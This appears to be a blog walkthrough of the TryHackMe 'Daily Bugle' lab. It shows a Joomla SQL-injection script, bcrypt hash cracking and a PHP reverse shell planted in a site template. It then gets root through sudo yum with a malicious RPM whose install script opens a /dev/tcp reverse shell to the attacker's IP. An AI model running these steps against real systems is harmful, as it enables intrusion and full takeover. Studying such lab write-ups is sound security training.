Today, we will root the Daily Bugle Machine from TryHackMe.
After deploying the machine, We are greeted with the first question.
Access the Server, Who robbed the bank?
Answer is there.
The next question says, the CMS is Joomla. We need to find the version.
Upon a Google search, I ended up here.
So, we can read the version by visiting
We got the version too.
This version of Joomla has an SQL injection vulnerability. Lets look up.
We can try with SQL Map, But a simpler pyhon script is available.
Lets run this on our target.
[email protected]:~/ex$ python joomblah.py http://10.10.249.33
We got the admin password hashes!
Lets crack this with John.
[email protected]:/home/kali/ex# john -w=/usr/share/wordlists/rockyou.txt jonah.txt -form=bcrypt
It took 40 minutes to get the hash cracked in my VM.
Lets login now.
With the password we just found.
Once We are inside, Go to templates > Templates and click on name of the active template.
Select the Index.php file and paste the reverse shell php script. Download the file from here and update with our IP.
Now listen from our machine port 4444 and load the main page of the site.
[email protected]:~/ex$ nc -nlvp 4444 listening on [any] 4444 ...
We got a reverse shell!
Let’s find the user flag now. First find the users.
sh-4.2$ cat /etc/passwd
Lets have a look at jjameson’s home directory.
But we dont have the permission for that.
Lets find some other way.
Have a look at /var/www/html/configuration.php file.
Lets try this password for the user.
bash-4.2$ su jjameson su jjameson Password: nv5uz9r3ZEDzVjNu [[email protected] html]$
The user can run yum without password on the machine.
We can read the user flag now.
We can install any package with yum as root user. Have a look at the following page.
Let us create a specially crafted RPM package and install in the target.
Lets follow this guide for the process.
[email protected]:/home/kali/ex# git clone https://github.com/jordansissel/fpm [email protected]:/home/kali/ex/fpm# gem install fpm [email protected]:/home/kali/ex/fpm# apt-get install rpm
Now create a file named root.sh for reverse shell.
#! /bin/bash bash -i >& /dev/tcp/10.9.42.115/9999 0>&1
Now create the RPM Package.
[email protected]:/home/kali/ex# fpm -n root -s dir -t rpm -a all --before-install root.sh /home/kali/ex
Now, Lets transfer the file to the target machine and install the package.
[email protected]:/home/kali/ex# python -m SimpleHTTPServer 222
and in the target,
[[email protected] ~]$ wget http://10.9.42.115:222/root-1.0-1.noarch.rpm
Listen for a connection at port 9999 in our attacker machine.
[email protected]:/home/kali/ex# nc -nlvp 9999 listening on [any] 9999 ...
and install the package in the target.
[[email protected] ~]$ sudo yum localinstall -y root-1.0-1.noarch.rpm
We got the root shell!
Lets read the root flag now.